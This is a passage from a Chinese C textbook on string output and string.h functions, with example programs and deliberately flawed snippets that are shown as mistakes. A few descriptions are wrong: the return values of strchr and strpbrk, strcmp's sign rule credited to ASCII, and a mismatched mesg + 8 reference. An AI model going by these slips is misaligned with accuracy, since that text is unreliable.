me. ray was initialized to me. inter was initialized to me. 如上所示,每个字符串独占一行,因为puts()在显示字符串时会自动在 其末尾添加一个换行符。 该程序示例再次说明,用双引号括起来的内容是字符串常量,且被视为 该字符串的地址。另外,储存字符串的数组名也被看作是地址。在第5个 puts()调用中,表达式&str1[5]是str1数组的第6个元素(r),puts()从该元素 开始输出。与此类似,第6个puts()调用中,str2+4指向储存"pointer"中i的存 储单元,puts()从这里开始输出。 puts()如何知道在何处停止?该函数在遇到空字符时就停止输出,所以 必须确保有空字符。不要模仿程序清单11.13中的程序! 程序清单11.13 nono.c程序 /* nono.c -- 千万不要模仿! */ 776 #include <stdio.h> int main(void) { char side_a[] = "Side A"; char dont[] = { 'W', 'O', 'W', '!' }; char side_b[] = "Side B"; puts(dont); /* dont 不是一个字符串 */ return 0; } 由于dont缺少一个表示结束的空字符,所以它不是一个字符串,因此 puts()不知道在何处停止。它会一直打印dont后面内存中的内容,直到发现一 个空字符为止。为了让puts()能尽快读到空字符,我们把dont放在side_a和 side_b之间。下面是该程序的一个运行示例: WOW!Side A 我们使用的编译器把side_a数组储存在dont数组之后,所以puts()一直输 出至遇到side_a中的空字符。你所使用的编译器输出的内容可能不同,这取 决于编译器如何在内存中储存数据。如果删除程序中的side_a和side_b数组 会怎样?通常内存中有许多空字符,如果幸运的话,puts()很快就会发现一 个。但是,这样做很不靠谱。 11.3.2 fputs()函数 fputs()函数是puts()针对文件定制的版本。它们的区别如下。 fputs()函数的第 2 个参数指明要写入数据的文件。如果要打印在显示器 777 上,可以用定义在stdio.h中的stdout(标准输出)作为该参数。 与puts()不同,fputs()不会在输出的末尾添加换行符。 注意,gets()丢弃输入中的换行符,但是puts()在输出中添加换行符。另 一方面,fgets()保留输入中的换行符,fputs()不在输出中添加换行符。假设 要编写一个循环,读取一行输入,另起一行打印出该输入。可以这样写: char line[81]; while (gets(line))// 与while (gets(line) != NULL)相同 puts(line); 如果gets()读到文件结尾会返回空指针。对空指针求值为0(即为假), 这样便可结束循环。或者,可以这样写: char line[81]; while (fgets(line, 81, stdin)) fputs(line, stdout); 第1个循环(使用gets()和puts()的while循环),line数组中的字符串显示 在下一行,因为puts()在字符串末尾添加了一个换行符。第2个循环(使用 fgets()和fputs()的while循环),line数组中的字符串也显示在下一行,因为 fgets()把换行符储存在字符串末尾。注意,如果混合使用 fgets()输入和puts() 输出,每个待显示的字符串末尾就会有两个换行符。这里关键要注意: puts()应与gets()配对使用,fputs()应与fgets()配对使用。 我们在这里提到已被废弃的 gets(),并不是鼓励使用它,而是为了让读 者了解它的用法。如果今后遇到包含该函数的代码,不至于看不懂。 11.3.3 printf()函数 778 在第4章中,我们详细讨论过printf()函数的用法。和puts()一样,printf() 也把字符串的地址作为参数。printf()函数用起来没有puts()函数那么方便, 但是它更加多才多艺,因为它可以格式化不同的数据类型。 与puts()不同的是,printf()不会自动在每个字符串末尾加上一个换行 符。因此,必须在参数中指明应该在哪里使用换行符。例如: printf("%s\n", string); 和下面的语句效果相同: puts(string); 如上所示,printf()的形式更复杂些,需要输入更多代码,而且计算机执 行的时间也更长(但是你觉察不到)。然而,使用 printf()打印多个字符串 更加简单。例如,下面的语句把 Well、用户名和一个#define定义的字符串 打印在一行: printf("Well, %s, %s\n", name, MSG); 779 11.4 自定义输入/输出函数 不一定非要使用C库中的标准函数,如果无法使用这些函数或者不想用 它们,完全可以在getchar()和putchar()的基础上自定义所需的函数。假设你 需要一个类似puts()但是不会自动添加换行符的函数。程序清单11.14给出了 一个这样的函数。 程序清单11.14 put1()函数 /* put1.c -- 打印字符串,不添加\n */ #include <stdio.h> void put1(const char * string)/* 不会改变字符串 */ { while (*string != '\0') putchar(*string++); } 指向char的指针string最初指向传入参数的首元素。因为该函数不会改变 传入的字符串,所以形参使用了const限定符。打印了首元素的内容后,指 
针递增1,指向下一个元素。while循环重复这一过程,直到指针指向包含空 字符的元素。记住,++的优先级高于*,因此putchar(*string++)打印string指 向的值,递增的是string本身,而不是递增它所指向的字符。 可以把 put1.c 程序作为编写字符串处理函数的模型。因为每个字符串都 以空字符结尾,所以不用给函数传递字符串的大小。函数依次处理每个字 符,直至遇到空字符。 用数组表示法编写这个函数稍微复杂些: 780 int i = 0; while (string[i]!= '\0') putchar(string[i++]); 要为数组索引创建一个额外的变量。 许多C程序员会在while循环中使用下面的测试条件: while (*string) 当string指向空字符时,*string的值是0,即测试条件为假,while循环结 束。这种方法比上面两种方法简洁。但是,如果不熟悉C语言,可能觉察不 出来。这种处理方法很普遍,作为C程序员应该熟悉这种写法。 注意 为什么程序清单11.14中的形式参数是const char * string,而不是const char sting[]?从技术方面看,两者等价且都有效。使用带方括号的写法是为 了提醒用户:该函数处理的是数组。然而,如果要处理字符串,实际参数可 以是数组名、用双引号括起来的字符串,或声明为 char *类型的变量。用 const char * string可以提醒用户:实际参数不一定是数组。 假设要设计一个类似puts()的函数,而且该函数还给出待打印字符的个 数。如程序清单11.15所示,添加一个功能很简单。 程序清单11.15 put2.c程序 /* put2.c -- 打印一个字符串,并统计打印的字符数 */ #include <stdio.h> int put2(const char * string) { 781 int count = 0; while (*string)  /* 常规用法 */ { putchar(*string++); count++; } putchar('\n');  /* 不统计换行符 */ return(count); } 下面的函数调用将打印字符串pizza: put1("pizza"); 下面的调用将返回统计的字符数,并将其赋给num(该例中,num的值 是5): num = put2("pizza"); 程序清单11.16使用一个简单的驱动程序测试put1()和put2(),并演示了嵌 套函数的调用。 程序清单11.16 .c程序 //put_put.c -- 用户自定义输出函数 #include <stdio.h> void put1(const char *); 782 int put2(const char *); int main(void) { put1("If I'd as much money"); put1(" as I could spend,\n"); printf("I count %d characters.\n", put2("I never would cry old chairs to mend.")); return 0; } void put1(const char * string) { while (*string) /* 与 *string != '\0' 相同 */ putchar(*string++); } int put2(const char * string) { int count = 0; while (*string) { 783 putchar(*string++); count++; } putchar('\n'); return(count); } 程序中使用 printf()打印 put2()的值,但是为了获得 put2()的返回值,计 算机必须先执行put2(),因此在打印字符数之前先打印了传递给该函数的字 符串。下面是该程序的输出: If I'd as much money as I could spend, I never would cry old chairs to mend. I count 37 characters. 784 11.5 字符串函数 C库提供了多个处理字符串的函数,ANSI C把这些函数的原型放在 string.h头文件中。其中最常用的函数有 strlen()、strcat()、strcmp()、 strncmp()、strcpy()和 strncpy()。另外,还有sprintf()函数,其原型在stdio.h头 文件中。欲了解string.h系列函数的完整列表,请查阅附录B中的参考资料 V“新增C99和C11的标准ANSI C库”。 11.5.1 strlen()函数 strlen()函数用于统计字符串的长度。下面的函数可以缩短字符串的长 度,其中用到了strlen(): void fit(char *string, unsigned int size) { if (strlen(string) > size) string[size] = '\0'; } 该函数要改变字符串,所以函数头在声明形式参数string时没有使用 const限定符。 程序清单11.17中的程序测试了fit()函数。注意代码中使用了C字符串常 量的串联特性。 程序清单11.17 test_fit.c程序 /* test_fit.c -- 使用缩短字符串长度的函数 */ #include <stdio.h> 785 #include <string.h>  /* 内含字符串函数原型 */ void fit(char *, unsigned int); int main(void) { char mesg [] = "Things should be as simple as possible," " but not simpler."; puts(mesg); fit(mesg, 38); puts(mesg); puts("Let's look at some more of the string."); puts(mesg + 39); return 0; } void fit(char *string, unsigned int size) { if (strlen(string) > size) string[size] = '\0'; } 下面是该程序的输出: 786 Things should be as simple as possible, but not simpler. Things should be as simple as possible Let's look at some more of the string. but not simpler. 
fit()函数把第39个元素的逗号替换成'\0'字符。puts()函数在空字符处停止 输出,并忽略其余字符。然而,这些字符还在缓冲区中,下面的函数调用把 这些字符打印了出来: puts(mesg + 8); 表达式mesg + 39是mesg[39]的地址,该地址上储存的是空格字符。所以 put()显示该字符并继续输出直至遇到原来字符串中的空字符。图11.4演示了 这一过程。 图11.4 puts()函数和空字符 注意 一些ANSI之前的系统使用strings.h头文件,而有些系统可能根本没有字 787 符串头文件。 string.h头文件中包含了C字符串函数系列的原型,因此程序清单11.17要 包含该头文件。 11.5.2 strcat()函数 strcat()(用于拼接字符串)函数接受两个字符串作为参数。该函数把第 2个字符串的备份附加在第1个字符串末尾,并把拼接后形成的新字符串作为 第1个字符串,第2个字符串不变。strcat()函数的类型是char *(即,指向char 的指针)。strcat()函数返回第1个参数,即拼接第2个字符串后的第1个字符 串的地址。 程序清单11.18演示了strcat()的用法。该程序还使用了程序清单11.10的 s_gets()函数。回忆一下,该函数使用fgets()读取一整行,如果有换行符,将 其替换成空字符。 程序清单11.18 str_cat.c程序 /* str_cat.c -- 拼接两个字符串 */ #include <stdio.h> #include <string.h> /* strcat()函数的原型在该头文件中 */ #define SIZE 80 char * s_gets(char * st, int n); int main(void) { char flower[SIZE]; char addon [] = "s smell like old shoes."; 788 puts("What is your favorite flower?"); if (s_gets(flower, SIZE)) { strcat(flower, addon); puts(flower); puts(addon); } else puts("End of file encountered!"); puts("bye"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { 789 while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 该程序的输出示例如下: What is your favorite flower? wonderflower wonderflowers smell like old shoes. s smell like old shoes. bye 从以上输出可以看出,flower改变了,而addon保持不变。 11.5.3 strncat()函数 strcat()函数无法检查第1个数组是否能容纳第2个字符串。如果分配给第 790 1个数组的空间不够大,多出来的字符溢出到相邻存储单元时就会出问题。 当然,可以像程序清单11.15那样,用strlen()查看第1个数组的长度。注意, 要给拼接后的字符串长度加1才够空间存放末尾的空字符。或者,用 strncat(),该函数的第3 个参数指定了最大添加字符数。例如,strncat(bugs, addon, 13)将把 addon字符串的内容附加给bugs,在加到第13个字符或遇到空 字符时停止。因此,算上空字符(无论哪种情况都要添加空字符),bugs数 组应该足够大,以容纳原始字符串(不包含空字符)、添加原始字符串在后 面的13个字符和末尾的空字符。程序清单11.19使用这种方法,计算avaiable 变量的值,用于表示允许添加的最大字符数。 程序清单11.19 join_chk.c程序 /* join_chk.c -- 拼接两个字符串,检查第1个数组的大小 */ #include <stdio.h> #include <string.h> #define SIZE 30 #define BUGSIZE 13 char * s_gets(char * st, int n); int main(void) { char flower[SIZE]; char addon [] = "s smell like old shoes."; char bug[BUGSIZE]; int available; 791 puts("What is your favorite flower?"); s_gets(flower, SIZE); if ((strlen(addon) + strlen(flower) + 1) <= SIZE) strcat(flower, addon); puts(flower); puts("What is your favorite bug?"); s_gets(bug, BUGSIZE); available = BUGSIZE - strlen(bug) - 1; strncat(bug, addon, available); puts(bug); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { 792 while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: What is your favorite flower? Rose Roses smell like old shoes. What is your favorite bug? Aphid Aphids smell 读者可能已经注意到,strcat()和 gets()类似,也会导致缓冲区溢出。为 什么 C11 标准不废弃strcat(),只留下strncat()?为何对gets()那么残忍?这也 许是因为gets()造成的安全隐患来自于使用该程序的人,而strcat()暴露的问 793 题是那些粗心的程序员造成的。无法控制用户会进行什么操作,但是,可以 控制你的程序做什么。C语言相信程序员,因此程序员有责任确保strcat()的 使用安全。 11.5.4 strcmp()函数 假设要把用户的响应与已储存的字符串作比较,如程序清单11.20所 示。 程序清单11.20 nogo.c程序 /* nogo.c -- 该程序是否能正常运行? */ #include <stdio.h> #define ANSWER "Grant" #define SIZE 40 char * s_gets(char * st, int n); int main(void) { char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); while (try != ANSWER) { puts("No, that's wrong. 
Try again."); 794 s_gets(try, SIZE); } puts("That's right!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; 795 } return ret_val; } 这个程序看上去没问题,但是运行后却不对劲。ANSWER和try都是指 针,所以try != ANSWER检查的不是两个字符串是否相等,而是这两个字符 串的地址是否相同。因为ANSWE和try储存在不同的位置,所以这两个地址 不可能相同,因此,无论用户输入什么,程序都提示输入不正确。这真让人 沮丧。 该函数要比较的是字符串的内容,不是字符串的地址。读者可以自己设 计一个函数,也可以使用C标准库中的strcmp()函数(用于字符串比较)。该 函数通过比较运算符来比较字符串,就像比较数字一样。如果两个字符串参 数相同,该函数就返回0,否则返回非零值。修改后的版本如程序清单11.21 所示。 程序清单11.21 compare.c程序 /* compare.c -- 该程序可以正常运行 */ #include <stdio.h> #include <string.h>  // strcmp()函数的原型在该头文件中 #define ANSWER "Grant" #define SIZE 40 char * s_gets(char * st, int n); int main(void) { 796 char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); while (strcmp(try, ANSWER) != 0) { puts("No, that's wrong. Try again."); s_gets(try, SIZE); } puts("That's right!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') 797 i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 注意 由于非零值都为“真”,所以许多经验丰富的C程序员会把该例main()中 的while循环头写成:while (strcmp(try, ANSWER)) strcmp()函数比较的是字符串,不是整个数组,这是非常好的功能。虽 然数组try占用了40字节,而储存在其中的"Grant"只占用了6字节(还有一个 用来放空字符),strcmp()函数只会比较try中第1个空字符前面的部分。所 以,可以用strcmp()比较储存在不同大小数组中的字符串。 如果用户输入GRANT、grant或Ulysses S.Grant会怎样?程序会告知用户 输入错误。希望程序更友好,必须把所有正确答案的可能性包含其中。这里 可以使用一些小技巧。例如,可以使用#define定义类似GRANT这样的答 案,并编写一个函数把输入的内容都转换成小写,就解决了大小写的问题。 但是,还要考虑一些其他错误的形式,这些留给读者完成。 1.strcmp()的返回值 798 如果strcmp()比较的字符串不同,它会返回什么值?请看程序清单11.22 的程序示例。 程序清单11.22 compback.c程序 /* compback.c -- strcmp()的返回值 */ #include <stdio.h> #include <string.h> int main(void) { printf("strcmp(\"A\", \"A\") is "); printf("%d\n", strcmp("A", "A")); printf("strcmp(\"A\", \"B\") is "); printf("%d\n", strcmp("A", "B")); printf("strcmp(\"B\", \"A\") is "); printf("%d\n", strcmp("B", "A")); printf("strcmp(\"C\", \"A\") is "); printf("%d\n", strcmp("C", "A")); printf("strcmp(\"Z\", \"a\") is "); printf("%d\n", strcmp("Z", "a")); printf("strcmp(\"apples\", \"apple\") is "); 799 printf("%d\n", strcmp("apples", "apple")); return 0; } 在我们的系统中运行该程序,输出如下: strcmp("A", "A") is 0 strcmp("A", "B") is -1 strcmp("B", "A") is 1 strcmp("C", "A") is 1 strcmp("Z", "a") is -1 strcmp("apples", "apple") is 1 strcmp()比较"A"和本身,返回0;比较"A"和"B",返回-1;比 较"B"和"A",返回1。这说明,如果在字母表中第1个字符串位于第2个字符 串前面,strcmp()中就返回负数;反之,strcmp()则返回正数。所以, strcmp()比较"C"和"A",返回1。其他系统可能返回2,即两者的ASCII码之 差。ASCII标准规定,在字母表中,如果第1个字符串在第2个字符串前面, strcmp()返回一个负数;如果两个字符串相同,strcmp()返回0;如果第1个字 符串在第2个字符串后面,strcmp()返回正数。然而,返回的具体值取决于实 现。例如,下面给出在不同实现中的输出,该实现返回两个字符的差值: strcmp("A", "A") is 0 strcmp("A", "B") is -1 strcmp("B", "A") is 1 strcmp("C", "A") is 2 800 strcmp("Z", "a") is -7 strcmp("apples", "apple") is 115 如果两个字符串开始的几个字符都相同会怎样?一般而言,strcmp()会 依次比较每个字符,直到发现第 1 对不同的字符为止。然后,返回相应的 值。例如,在上面的最后一个例子中,"apples"和"apple"只有最后一对字符 不同("apples"的s和"apple"的空字符)。由于空字符在ASCII中排第1。字符 s一定在它后面,所以strcmp()返回一个正数。 最后一个例子表明,strcmp()比较所有的字符,不只是字母。所以,与 其说该函数按字母顺序进行比较,不如说是按机器排序序列(machine collating sequence)进行比较,即根据字符的数值进行比较(通常都使用 ASCII值)。在ASCII中,大写字母在小写字母前面,所以strcmp("Z", "a")返 回的是负值。 大多数情况下,strcmp()返回的具体值并不重要,我们只在意该值是0还 是非0(即,比较的两个字符串是否相等)。或者按字母排序字符串,在这 种情况下,需要知道比较的结果是为正、为负还是为0。 注意 strcmp()函数比较的是字符串,不是字符,所以其参数应该是字符串 (如"apples"和"A"),而不是字符(如'A')。但是,char 类型实际上是整数 类型,所以可以使用关系运算符来比较字符。假设word是储存在char类型数 组中的字符串,ch是char类型的变量,下面的语句都有效: if 
(strcmp(word, "quit") == 0) // 使用strcmp()比较字符串 puts("Bye!"); if (ch == 'q') // 使用 == 比较字符 puts("Bye!"); 801 尽管如此,不要使用ch或'q'作为strcmp()的参数。 程序清单11.23用strcmp()函数检查程序是否要停止读取输入。 程序清单11.23 quit_chk.c程序 /* quit_chk.c -- 某程序的开始部分 */ #include <stdio.h> #include <string.h> #define SIZE 80 #define LIM 10 #define STOP "quit" char * s_gets(char * st, int n); int main(void) { char input[LIM][SIZE]; int ct = 0; printf("Enter up to %d lines (type quit to quit):\n", LIM); while (ct < LIM && s_gets(input[ct], SIZE) != NULL && strcmp(input[ct], STOP) != 0) { ct++; 802 } printf("%d strings entered\n", ct); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } 803 return ret_val; } 该程序在读到EOF字符(这种情况下s_gets()返回NULL)、用户输入quit 或输入项达到LIM时退出。 顺带一提,有时输入空行(即,只按下Enter键或Return键)表示结束输 入更方便。为实现这一功能,只需修改一下while循环的条件即可: while (ct < LIM && s_gets(input[ct], SIZE) != NULL&& input[ct][0] != '\0') 这里,input[ct]是刚输入的字符串,input[ct][0]是该字符串的第1个字 符。如果用户输入空行, s_gets()便会把该行第1个字符(换行符)替换成空 字符。所以,下面的表达式用于检测空行: input[ct][0] != '\0' 2.strncmp()函数 strcmp()函数比较字符串中的字符,直到发现不同的字符为止,这一过 程可能会持续到字符串的末尾。而strncmp()函数在比较两个字符串时,可以 比较到字符不同的地方,也可以只比较第3个参数指定的字符数。例如,要 查找以"astro"开头的字符串,可以限定函数只查找这5 个字符。程序清单 11.24 演示了该函数的用法。 程序清单11.24 starsrch.c程序 /* starsrch.c -- 使用 strncmp() */ #include <stdio.h> #include <string.h> #define LISTSIZE 6 804 int main() { const char * list[LISTSIZE] = { "astronomy", "astounding", "astrophysics", "ostracize", "asterism", "astrophobia" }; int count = 0; int i; for (i = 0; i < LISTSIZE; i++) if (strncmp(list[i], "astro", 5) == 0) { printf("Found: %s\n", list[i]); count++; } printf("The list contained %d words beginning" " with astro.\n", count); return 0; 805 } 下面是该程序的输出: Found: astronomy Found: astrophysics Found: astrophobia The list contained 3 words beginning with astro. 11.5.5 strcpy()和strncpy()函数 前面提到过,如果pts1和pts2都是指向字符串的指针,那么下面语句拷 贝的是字符串的地址而不是字符串本身: pts2 = pts1; 如果希望拷贝整个字符串,要使用strcpy()函数。程序清单11.25要求用 户输入以q开头的单词。该程序把输入拷贝至一个临时数组中,如果第1 个 字母是q,程序调用strcpy()把整个字符串从临时数组拷贝至目标数组中。 strcpy()函数相当于字符串赋值运算符。 程序清单11.25 copy1.c程序 /* copy1.c -- 演示 strcpy() */ #include <stdio.h> #include <string.h> // strcpy()的原型在该头文件中 #define SIZE 40 #define LIM 5 806 char * s_gets(char * st, int n); int main(void) { char qwords[LIM][SIZE]; char temp[SIZE]; int i = 0; printf("Enter %d words beginning with q:\n", LIM); while (i < LIM && s_gets(temp, SIZE)) { if (temp[0] != 'q') printf("%s doesn't begin with q!\n", temp); else { strcpy(qwords[i], temp); i++; } } puts("Here are the words accepted:"); for (i = 0; i < LIM; i++) 807 puts(qwords[i]); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; 808 } 下面是该程序的运行示例: Enter 5 words beginning with q: quackery quasar quilt quotient no more no more doesn't begin with q! quiz Here are the words accepted: quackery quasar quilt quotient quiz 注意,只有在输入以q开头的单词后才会递增计数器i,而且该程序通过 比较字符进行判断: if (temp[0] != 'q') 809 这行代码的意思是:temp中的第1个字符是否是q?当然,也可以通过比 较字符串进行判断: if (strncmp(temp, "q", 1) != 0) 这行代码的意思是:temp字符串和"q"的第1个元素是否相等? 
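在继续分析strcpy()的参数之前,下面给出一个简短的示意性片段,对比“指针赋值”与strcpy()拷贝内容的区别(其中的变量名source、target、pts只是为说明而假设的,并非来自前面的程序清单):
/* 示意性片段:指针赋值 vs. strcpy() */
#include <stdio.h>
#include <string.h>
int main(void)
{
    char source[40] = "quartz";
    char target[40];
    char * pts;

    pts = source;             /* 只拷贝地址,pts 与 source 指向同一块内存 */
    strcpy(target, source);   /* 拷贝内容,target 得到独立的一份副本    */
    source[0] = 'Q';          /* 修改原字符串                           */
    printf("%s %s %s\n", source, pts, target);  /* 预期输出:Quartz Quartz quartz */
    return 0;
}
可以看到,修改source会“连带”影响pts指向的内容,而target不受影响——这正说明strcpy()才是真正意义上的字符串赋值。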
请注意,strcpy()第2个参数(temp)指向的字符串被拷贝至第1个参数 (qword[i])指向的数组中。拷贝出来的字符串被称为目标字符串,最初的 字符串被称为源字符串。参考赋值表达式语句,很容易记住strcpy()参数的 顺序,即第1个是目标字符串,第2个是源字符串。 char target[20]; int x; x = 50;          /* 数字赋值*/ strcpy(target, "Hi ho!"); /* 字符串赋值*/ target = "So long";    /* 语法错误 */程序员有责任确保目标数组有 足够的空间容纳源字符串的副本。下面的代码有点问题: char * str; strcpy(str, "The C of Tranquility");   // 有问题 strcpy()把"The C of Tranquility"拷贝至str指向的地址上,但是str未被初始 化,所以该字符串可能被拷贝到任意的地方! 总之,strcpy()接受两个字符串指针作为参数,可以把指向源字符串的 第2个指针声明为指针、数组名或字符串常量;而指向源字符串副本的第1个 指针应指向一个数据对象(如,数组),且该对象有足够的空间储存源字符 串的副本。记住,声明数组将分配储存数据的空间,而声明指针只分配储存 一个地址的空间。 810 1.strcpy()的其他属性 strcpy()函数还有两个有用的属性。第一,strcpy()的返回类型是 char *, 该函数返回的是第 1个参数的值,即一个字符的地址。第二,第 1 个参数不 必指向数组的开始。这个属性可用于拷贝数组的一部分。程序清单11.26演 示了该函数的这两个属性。 程序清单11.26 copy2.c程序 /* copy2.c -- 使用 strcpy() */ #include <stdio.h> #include <string.h>  // 提供strcpy()的函数原型 #define WORDS  "beast" #define SIZE 40 int main(void) { const char * orig = WORDS; char copy[SIZE] = "Be the best that you can be."; char * ps; puts(orig); puts(copy); ps = strcpy(copy + 7, orig); puts(copy); 811 puts(ps); return 0; } 下面是该程序的输出: beast Be the best that you can be. Be the beast beast 注意,strcpy()把源字符串中的空字符也拷贝在内。在该例中,空字符 覆盖了copy数组中that的第1个t(见图11.5)。注意,由于第1个参数是copy + 7,所以ps指向copy中的第8个元素(下标为7)。因此puts(ps)从该处开始打 印字符串。 图11.5 使用指针strcpy()函数 812 2.更谨慎的选择:strncpy() strcpy()和 strcat()都有同样的问题,它们都不能检查目标空间是否能容 纳源字符串的副本。拷贝字符串用 strncpy()更安全,该函数的第 3 个参数指 明可拷贝的最大字符数。程序清单 11.27 用strncpy()代替程序清单11.25中的 strcpy()。为了演示目标空间装不下源字符串的副本会发生什么情况,该程 序使用了一个相当小的目标字符串(共7个元素,包含6个字符)。 程序清单11.27 copy3.c程序 /* copy3.c -- 使用strncpy() */ #include <stdio.h> #include <string.h>  /* 提供strncpy()的函数原型*/ #define SIZE 40 #define TARGSIZE 7 #define LIM 5 char * s_gets(char * st, int n); int main(void) { char qwords[LIM][TARGSIZE]; char temp[SIZE]; int i = 0; printf("Enter %d words beginning with q:\n", LIM); 813 while (i < LIM && s_gets(temp, SIZE)) { if (temp[0] != 'q') printf("%s doesn't begin with q!\n", temp); else { strncpy(qwords[i], temp, TARGSIZE - 1); qwords[i][TARGSIZE - 1] = '\0'; i++; } } puts("Here are the words accepted:"); for (i = 0; i < LIM; i++) puts(qwords[i]); return 0; } char * s_gets(char * st, int n) { char * ret_val; 814 int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: Enter 5 words beginning with q: quack quadratic quisling 815 quota quagga Here are the words accepted: quack quadra quisli quota quagga strncpy(target, source, n)把source中的n个字符或空字符之前的字符(先满 足哪个条件就拷贝到何处)拷贝至target中。因此,如果source中的字符数小 于n,则拷贝整个字符串,包括空字符。但是,strncpy()拷贝字符串的长度不 会超过n,如果拷贝到第n个字符时还未拷贝完整个源字符串,就不会拷贝空 字符。所以,拷贝的副本中不一定有空字符。鉴于此,该程序把 n 设置为比 目标数组大小少1(TARGSIZE-1),然后把数组最后一个元素设置为空字 符: strncpy(qwords[i], temp, TARGSIZE - 1); qwords[i][TARGSIZE - 1] = '\0'; 这样做确保储存的是一个字符串。如果目标空间能容纳源字符串的副 本,那么从源字符串拷贝的空字符便是该副本的结尾;如果目标空间装不下 副本,则把副本最后一个元素设置为空字符。 11.5.6 sprintf()函数 sprintf()函数声明在stdio.h中,而不是在string.h中。该函数和printf()类 816 似,但是它是把数据写入字符串,而不是打印在显示器上。因此,该函数可 以把多个元素组合成一个字符串。sprintf()的第1个参数是目标字符串的地 址。其余参数和printf()相同,即格式字符串和待写入项的列表。 程序清单11.28中的程序用printf()把3个项(两个字符串和一个数字)组 合成一个字符串。注意, sprintf()的用法和printf()相同,只不过sprintf()把组 合后的字符串储存在数组formal中而不是显示在屏幕上。 程序清单11.28 format.c程序 /* format.c -- 格式化字符串 */ #include <stdio.h> #define MAX 20 char * s_gets(char * st, int n); int main(void) { char first[MAX]; char last[MAX]; char formal[2 * MAX + 10]; double prize; puts("Enter your first name:"); s_gets(first, MAX); puts("Enter your last name:"); 817 s_gets(last, MAX); puts("Enter your 
prize money:"); scanf("%lf", &prize); sprintf(formal, "%s, %-19s: $%6.2f\n", last, first, prize); puts(formal); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else 818 while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的运行示例: Enter your first name: Annie Enter your last name: von Wurstkasse Enter your prize money: 25000 von Wurstkasse, Annie        : $25000.00 sprintf()函数获取输入,并将其格式化为标准形式,然后把格式化后的 字符串储存在formal中。 11.5.7 其他字符串函数 ANSI C库有20多个用于处理字符串的函数,下面总结了一些常用的函 数。 char *strcpy(char * restrict s1, const char * restrict s2); 该函数把s2指向的字符串(包括空字符)拷贝至s1指向的位置,返回值 819 是s1。 char *strncpy(char * restrict s1, const char * restrict s2, size_t n); 该函数把s2指向的字符串拷贝至s1指向的位置,拷贝的字符数不超过 n,其返回值是s1。该函数不会拷贝空字符后面的字符,如果源字符串的字 符少于n个,目标字符串就以拷贝的空字符结尾;如果源字符串有n个或超过 n个字符,就不拷贝空字符。 char *strcat(char * restrict s1, const char * restrict s2); 该函数把s2指向的字符串拷贝至s1指向的字符串末尾。s2字符串的第1 个字符将覆盖s1字符串末尾的空字符。该函数返回s1。 char *strncat(char * restrict s1, const char * restrict s2, size_t n); 该函数把s2字符串中的n个字符拷贝至s1字符串末尾。s2字符串的第1个 字符将覆盖s1字符串末尾的空字符。不会拷贝s2字符串中空字符和其后的字 符,并在拷贝字符的末尾添加一个空字符。该函数返回s1。 int strcmp(const char * s1, const char * s2); 如果s1字符串在机器排序序列中位于s2字符串的后面,该函数返回一个 正数;如果两个字符串相等,则返回0;如果s1字符串在机器排序序列中位 于s2字符串的前面,则返回一个负数。 int strncmp(const char * s1, const char * s2, size_t n); 该函数的作用和strcmp()类似,不同的是,该函数在比较n个字符后或遇 到第1个空字符时停止比较。 char *strchr(const char * s, int c); 如果s字符串中包含c字符,该函数返回指向s字符串首位置的指针(末 尾的空字符也是字符串的一部分,所以在查找范围内);如果在字符串s中 820 未找到c字符,该函数则返回空指针。 char *strpbrk(const char * s1, const char * s2);如果 s1 字符中包含 s2 字符 串中的任意字符,该函数返回指向 s1 字符串首位置的指针;如果在s1字符 串中未找到任何s2字符串中的字符,则返回空字符。 char *strrchr(const char * s, int c);该函数返回s字符串中c字符的最后一次 出现的位置(末尾的空字符也是字符串的一部分,所以在查找范围内)。如 果未找到c字符,则返回空指针。 char *strstr(const char * s1, const char * s2); 该函数返回指向s1字符串中s2字符串出现的首位置。如果在s1中没有找 到s2,则返回空指针。 size_t strlen(const char * s); 该函数返回s字符串中的字符数,不包括末尾的空字符。 请注意,那些使用const关键字的函数原型表明,函数不会更改字符 串。例如,下面的函数原型: char *strcpy(char * restrict s1, const char * restrict s2); 表明不能更改s2指向的字符串,至少不能在strcpy()函数中更改。但是可 以更改s1指向的字符串。这样做很合理,因为s1是目标字符串,要改变,而 s2是源字符串,不能更改。 关键字restrict将在第12章中介绍,该关键字限制了函数参数的用法。例 如,不能把字符串拷贝给本身。 第5章中讨论过,size_t类型是sizeof运算符返回的类型。C规定sizeof运 算符返回一个整数类型,但是并未指定是哪种整数类型,所以size_t在一个 系统中可以是unsigned int,而在另一个系统中可以是 unsigned long。string.h 头文件针对特定系统定义了 size_t,或者参考其他有 size_t定义的头文件。 821 